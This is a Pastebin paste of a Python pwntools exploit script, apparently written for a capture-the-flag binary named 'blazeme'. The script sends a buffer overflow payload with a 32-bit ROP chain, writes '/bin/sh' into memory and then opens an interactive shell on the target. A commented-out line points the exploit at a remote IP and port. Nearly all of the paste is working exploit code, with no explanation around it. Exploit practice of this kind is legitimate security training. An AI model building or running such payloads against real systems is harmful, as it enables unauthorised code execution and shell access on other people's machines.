API tools faq
paste
finalshare

Untitled

finalshare
Sep 8th, 2019
236
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.14 KB | None | 0 0
raw download clone embed print report
  1. from pwn import *
  2. import time
  3. context.arch='i386'
  4. context.bits=32
  5. context.log_level='debug'
  6. r=process("./blazeme",aslr=False)
  7.  
  8. #r=remote("139.180.145.209",7492)
  9. # gdb.attach(r,"""
  10. #   b  * 0x080484ac
  11.  
  12. #   c
  13. #   """)
  14. #print r.recv()
  15. #0x0000000000410493 : pop rsi ; ret
  16. #0x0000000000400676 : pop rdi ; ret
  17. #0x0000000000417cc3 : pop rcx ; ret
  18. #0x0000000000435c1b : mov word ptr [rdi], cx ; ret
  19.  
  20. payload="1"*0x64
  21. #0x0804858f : xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret
  22. #stage 1 mov to buffer
  23.  
  24. payload+=p32(0x1000)
  25.  
  26. payload+=p32(0x804a900)
  27.  
  28. payload+=p32(0x804a900)
  29.  
  30. payload+=p32(0x0804843D)
  31. payload+=p32(0)
  32. payload+=p32(0x804a800)
  33. payload+=p32(0x1000)
  34. payload+=p32(0x0804843D)
  35. r.send(payload)
  36. raw_input()
  37. payload1="\x00"*(0x100-16)+"/bin/sh\x00"+p32(0x080482ce)*2+p32(0x804a8fc)
  38. payload1+=p32(0x080482F0 )
  39. payload1+=p32(0x080484ac  )
  40. payload1+=p32(0)
  41. payload1+=p32(0x804a00c-10)
  42. payload1+=p32(0x804a92c)
  43. payload1+=p32(2)
  44. payload1+=p32(0x080482d1)
  45. payload1+=p32(0x804a8f0)
  46. payload1+=p32(0x080482F0)
  47. #binsh=0x804a8f0
  48. r.sendline(payload1)
  49. raw_input()
  50. payload2='\x00'*10+'\xd0'
  51. r.send(payload2)
  52. r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!